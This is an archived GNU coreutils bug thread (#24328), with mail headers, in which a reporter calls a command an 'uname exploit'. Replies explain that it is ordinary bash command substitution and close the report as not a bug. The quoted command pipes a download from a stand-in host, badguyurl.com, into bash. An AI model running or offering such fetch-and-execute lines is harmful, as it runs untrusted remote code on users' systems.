From unknown Tue Aug 19 21:02:08 2025 X-Loop: help-debbugs@gnu.org Subject: bug#24328: uname exploit Resent-From: Shane Original-Sender: "Debbugs-submit" Resent-CC: bug-coreutils@gnu.org Resent-Date: Mon, 29 Aug 2016 15:28:01 +0000 Resent-Message-ID: Resent-Sender: help-debbugs@gnu.org X-GNU-PR-Message: report 24328 X-GNU-PR-Package: coreutils X-GNU-PR-Keywords: To: 24328@debbugs.gnu.org X-Debbugs-Original-To: bug-coreutils@gnu.org Received: via spool by submit@debbugs.gnu.org id=B.14724844272602 (code B ref -1); Mon, 29 Aug 2016 15:28:01 +0000 Received: (at submit) by debbugs.gnu.org; 29 Aug 2016 15:27:07 +0000 Received: from localhost ([127.0.0.1]:43715 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOSp-0000fu-JT for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:27:07 -0400 Received: from eggs.gnu.org ([208.118.235.92]:39474) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beGwc-0004OC-B4 for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:22 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwW-0002vP-DW for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:17 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,FREEMAIL_FROM, T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:56604) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwW-0002vJ-Ac for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:16 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:58676) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwU-0001EI-7F for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:15 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwQ-0002uk-3Q for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:13 -0400 Received: from mail-oi0-x236.google.com ([2607:f8b0:4003:c06::236]:33382) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwP-0002uH-Rm for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:10 -0400 Received: by mail-oi0-x236.google.com with SMTP id c15so185074096oig.0 for ; Mon, 29 Aug 2016 00:25:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=to:from:subject:message-id:date:user-agent:mime-version :content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=kxcgfVV4Lo0PFHQoKDswA8mowDuuYQLhr/fNUO6f0cxpMyzejweGTDbilCEDYGbvDe IFtQUocDZZRW2DofdmBfxHlXgF50ZAHj1LOdP6fahinr6xaJp/lI4hJysSH4d/yZ2MBa PuGxZlwRkTVjyl1Cq4w7qC+TXpvOKHbxRAMVhIIat0fNCEwHMa39LXuGxcXjKdTVXEMJ mdU3SFuuPanuNam+oA6x+7p3e5GntJbG1+TYAqRBIrQcPEfa5CaXF35ilVwQXWZCG7we nbhW243f9Y6sWUmRJ0W+S7WDe44qt0jJ7uTLe49k54ts7lkeFs6wkVAJCYIfn68O7V9D 8dww== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:to:from:subject:message-id:date:user-agent :mime-version:content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=KRlFA4Z6xNzSy+oQzB2mneYFljh1nPVdZhYK2dIFiO/Feyd3DhkBMm1pDSpRDSXFG/ jTgXUyCwHKmhXidyvlXrUx/U5/+LLoonG066yD/EN5GbWNQDLeS7Wg4uUZZHwQ4sDAED MgEWt6+gSuHx7gFCXC3kEzBd2yqYw54Ajs5NgWz9LH+6a9ziNIVt0PBqUSPfQtlxF0Xc srTUWr+YuQoBFmCBVH+w4fGZjHBZcw1D9KZDzn0Eqvgg2vFqQ8Iepfm5MMrV4QK8Wj+G BSo+IT1WguWzfZsbSU/QwjRcgY/Bkhoz3hKvSzCddcQGy3l0i/2pvhiMFgrIYKUe6PUv 9Zbg== X-Gm-Message-State: AE9vXwPM/Xexc1a9DDfWecy0woTJ7Y/B36umarnA97Pimi1Fa0pcrAmdGP0tl2mo8zz6RQ== X-Received: by 10.157.20.73 with SMTP id h67mr11005296oth.60.1472455508305; Mon, 29 Aug 2016 00:25:08 -0700 (PDT) Received: from [192.168.1.140] (ip68-13-79-198.om.om.cox.net. [68.13.79.198]) by smtp.gmail.com with ESMTPSA id x203sm14421483oix.12.2016.08.29.00.25.07 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 29 Aug 2016 00:25:07 -0700 (PDT) From: Shane Message-ID: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Date: Mon, 29 Aug 2016 02:25:03 -0500 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -4.0 (----) X-Mailman-Approved-At: Mon, 29 Aug 2016 11:27:06 -0400 X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -4.0 (----) Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" From unknown Tue Aug 19 21:02:08 2025 X-Loop: help-debbugs@gnu.org Subject: bug#24328: uname exploit Resent-From: Evan J Johnson Original-Sender: "Debbugs-submit" Resent-CC: bug-coreutils@gnu.org Resent-Date: Mon, 29 Aug 2016 15:50:02 +0000 Resent-Message-ID: Resent-Sender: help-debbugs@gnu.org X-GNU-PR-Message: followup 24328 X-GNU-PR-Package: coreutils X-GNU-PR-Keywords: To: 24328@debbugs.gnu.org X-Debbugs-Original-To: bug-coreutils@gnu.org Received: via spool by submit@debbugs.gnu.org id=B.14724857424829 (code B ref -1); Mon, 29 Aug 2016 15:50:02 +0000 Received: (at submit) by debbugs.gnu.org; 29 Aug 2016 15:49:02 +0000 Received: from localhost ([127.0.0.1]:43741 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOo2-0001Fp-4q for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:49:02 -0400 Received: from eggs.gnu.org ([208.118.235.92]:51314) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOmo-0001DM-E4 for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:46 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beOmi-0005Nn-As for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:41 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=BAYES_40,T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:33459) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmi-0005NT-5X for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:47:40 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:42268) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmf-0001gH-SR for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:38 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beOmc-0005Ll-Mz for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:37 -0400 Received: from out4-smtp.messagingengine.com ([66.111.4.28]:57462) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beOmb-0005Jc-Bc for bug-coreutils@gnu.org; Mon, 29 Aug 2016 11:47:34 -0400 Received: from compute4.internal (compute4.nyi.internal [10.202.2.44]) by mailout.nyi.internal (Postfix) with ESMTP id A57FA2060B for ; Mon, 29 Aug 2016 11:47:22 -0400 (EDT) Received: from web4 ([10.202.2.214]) by compute4.internal (MEProxy); Mon, 29 Aug 2016 11:47:22 -0400 DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d= messagingengine.com; h=content-transfer-encoding:content-type :date:from:in-reply-to:message-id:mime-version:references :subject:to:x-sasl-enc:x-sasl-enc; s=smtpout; bh=/BI2jIseQOenmRF /I3Z6dSg/MFA=; b=Tl1F4YtuvnYwG+jBqmLUY78nruRysG4rn4K55Ue0YU8uZNn +wHYRMfWR90uY/xjGLlYOYtzHV1zJprGC8ej8Rvg+WjbgJx9lc9axgPYXrHCKGZ2 Ko9mf9I4stJ6F3P7r7DqjzFJGf34rf5rw+HRnQe32Jk964IXHMhve06I/UIQ= Received: by mailuser.nyi.internal (Postfix, from userid 99) id 71AE3CC803; Mon, 29 Aug 2016 11:47:22 -0400 (EDT) Message-Id: <1472485642.3217795.709298825.3960D2F0@webmail.messagingengine.com> X-Sasl-Enc: btH2KqIGMB6SCieU2ra1SLhGTnm6fF6u7o1tXSZUSa2J 1472485642 From: Evan J Johnson MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain X-Mailer: MessagingEngine.com Webmail Interface - ajax-5778c97d In-Reply-To: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> References: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Date: Mon, 29 Aug 2016 08:47:22 -0700 X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -5.0 (-----) X-Mailman-Approved-At: Mon, 29 Aug 2016 11:49:00 -0400 X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -5.0 (-----) Hey Shane, I'm no bash/systems/coreutils expert, but I believe this behavior is completely expected, independent of uname, and documented. $(...) is the command substitution syntax and it will cause the command inside the parens to be run, with the output used as input. Here's a link to the behavior on gnu.org. https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution It won't work if you use single quotes, which is also expected. Evan On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote: > Hi, I am unsure if you have seen this, but I am concerned about this - > can or should uname be restricted to root use only? > > uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" > > > > > From unknown Tue Aug 19 21:02:08 2025 MIME-Version: 1.0 X-Mailer: MIME-tools 5.505 (Entity 5.505) X-Loop: help-debbugs@gnu.org From: help-debbugs@gnu.org (GNU bug Tracking System) To: Shane Subject: bug#24328: closed (Re: bug#24328: uname exploit) Message-ID: References: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> X-Gnu-PR-Message: they-closed 24328 X-Gnu-PR-Package: coreutils Reply-To: 24328@debbugs.gnu.org Date: Mon, 29 Aug 2016 15:59:02 +0000 Content-Type: multipart/mixed; boundary="----------=_1472486342-5814-1" This is a multi-part message in MIME format... ------------=_1472486342-5814-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset="utf-8" Your bug report #24328: uname exploit which was filed against the coreutils package, has been closed. The explanation is attached below, along with your original report. If you require more details, please reply to 24328@debbugs.gnu.org. --=20 24328: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=3D24328 GNU Bug Tracking System Contact help-debbugs@gnu.org with problems ------------=_1472486342-5814-1 Content-Type: message/rfc822 Content-Disposition: inline Content-Transfer-Encoding: 7bit Received: (at 24328-done) by debbugs.gnu.org; 29 Aug 2016 15:58:49 +0000 Received: from localhost ([127.0.0.1]:43795 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOxV-0001VM-Cg for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:58:49 -0400 Received: from zimbra.cs.ucla.edu ([131.179.128.68]:54428) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOxT-0001V8-AU for 24328-done@debbugs.gnu.org; Mon, 29 Aug 2016 11:58:47 -0400 Received: from localhost (localhost [127.0.0.1]) by zimbra.cs.ucla.edu (Postfix) with ESMTP id 5C4F81601CD; Mon, 29 Aug 2016 08:58:41 -0700 (PDT) Received: from zimbra.cs.ucla.edu ([127.0.0.1]) by localhost (zimbra.cs.ucla.edu [127.0.0.1]) (amavisd-new, port 10032) with ESMTP id q9n8RUoRKMGk; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by zimbra.cs.ucla.edu (Postfix) with ESMTP id 84A9516107E; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) X-Virus-Scanned: amavisd-new at zimbra.cs.ucla.edu Received: from zimbra.cs.ucla.edu ([127.0.0.1]) by localhost (zimbra.cs.ucla.edu [127.0.0.1]) (amavisd-new, port 10026) with ESMTP id cm7VeDkSvhTp; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Received: from [192.168.1.9] (unknown [100.32.155.148]) by zimbra.cs.ucla.edu (Postfix) with ESMTPSA id 67BE01601CD; Mon, 29 Aug 2016 08:58:40 -0700 (PDT) Subject: Re: bug#24328: uname exploit To: Shane , 24328-done@debbugs.gnu.org References: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> From: Paul Eggert Organization: UCLA Computer Science Department Message-ID: Date: Mon, 29 Aug 2016 08:58:40 -0700 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Score: -1.5 (-) X-Debbugs-Envelope-To: 24328-done X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -1.5 (-) Shane wrote: > uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" I don't see a bug here, so I'm marking this as done. ------------=_1472486342-5814-1 Content-Type: message/rfc822 Content-Disposition: inline Content-Transfer-Encoding: 7bit Received: (at submit) by debbugs.gnu.org; 29 Aug 2016 15:27:07 +0000 Received: from localhost ([127.0.0.1]:43715 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beOSp-0000fu-JT for submit@debbugs.gnu.org; Mon, 29 Aug 2016 11:27:07 -0400 Received: from eggs.gnu.org ([208.118.235.92]:39474) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1beGwc-0004OC-B4 for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:22 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwW-0002vP-DW for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:17 -0400 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00,FREEMAIL_FROM, T_DKIM_INVALID autolearn=disabled version=3.3.2 Received: from lists.gnu.org ([2001:4830:134:3::11]:56604) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwW-0002vJ-Ac for submit@debbugs.gnu.org; Mon, 29 Aug 2016 03:25:16 -0400 Received: from eggs.gnu.org ([2001:4830:134:3::10]:58676) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwU-0001EI-7F for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:15 -0400 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1beGwQ-0002uk-3Q for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:13 -0400 Received: from mail-oi0-x236.google.com ([2607:f8b0:4003:c06::236]:33382) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1beGwP-0002uH-Rm for bug-coreutils@gnu.org; Mon, 29 Aug 2016 03:25:10 -0400 Received: by mail-oi0-x236.google.com with SMTP id c15so185074096oig.0 for ; Mon, 29 Aug 2016 00:25:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=to:from:subject:message-id:date:user-agent:mime-version :content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=kxcgfVV4Lo0PFHQoKDswA8mowDuuYQLhr/fNUO6f0cxpMyzejweGTDbilCEDYGbvDe IFtQUocDZZRW2DofdmBfxHlXgF50ZAHj1LOdP6fahinr6xaJp/lI4hJysSH4d/yZ2MBa PuGxZlwRkTVjyl1Cq4w7qC+TXpvOKHbxRAMVhIIat0fNCEwHMa39LXuGxcXjKdTVXEMJ mdU3SFuuPanuNam+oA6x+7p3e5GntJbG1+TYAqRBIrQcPEfa5CaXF35ilVwQXWZCG7we nbhW243f9Y6sWUmRJ0W+S7WDe44qt0jJ7uTLe49k54ts7lkeFs6wkVAJCYIfn68O7V9D 8dww== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:to:from:subject:message-id:date:user-agent :mime-version:content-transfer-encoding; bh=lBzJEzzjzYStv/p80jX0Ib474XujR2D1/ChuTs99Wt8=; b=KRlFA4Z6xNzSy+oQzB2mneYFljh1nPVdZhYK2dIFiO/Feyd3DhkBMm1pDSpRDSXFG/ jTgXUyCwHKmhXidyvlXrUx/U5/+LLoonG066yD/EN5GbWNQDLeS7Wg4uUZZHwQ4sDAED MgEWt6+gSuHx7gFCXC3kEzBd2yqYw54Ajs5NgWz9LH+6a9ziNIVt0PBqUSPfQtlxF0Xc srTUWr+YuQoBFmCBVH+w4fGZjHBZcw1D9KZDzn0Eqvgg2vFqQ8Iepfm5MMrV4QK8Wj+G BSo+IT1WguWzfZsbSU/QwjRcgY/Bkhoz3hKvSzCddcQGy3l0i/2pvhiMFgrIYKUe6PUv 9Zbg== X-Gm-Message-State: AE9vXwPM/Xexc1a9DDfWecy0woTJ7Y/B36umarnA97Pimi1Fa0pcrAmdGP0tl2mo8zz6RQ== X-Received: by 10.157.20.73 with SMTP id h67mr11005296oth.60.1472455508305; Mon, 29 Aug 2016 00:25:08 -0700 (PDT) Received: from [192.168.1.140] (ip68-13-79-198.om.om.cox.net. [68.13.79.198]) by smtp.gmail.com with ESMTPSA id x203sm14421483oix.12.2016.08.29.00.25.07 for (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 29 Aug 2016 00:25:07 -0700 (PDT) To: bug-coreutils@gnu.org From: Shane Subject: uname exploit Message-ID: <0374e0c7-509f-6fb2-834c-7719bc18a76c@gmail.com> Date: Mon, 29 Aug 2016 02:25:03 -0500 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic] X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6.x X-Received-From: 2001:4830:134:3::11 X-Spam-Score: -4.0 (----) X-Debbugs-Envelope-To: submit X-Mailman-Approved-At: Mon, 29 Aug 2016 11:27:06 -0400 X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -4.0 (----) Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\" ------------=_1472486342-5814-1--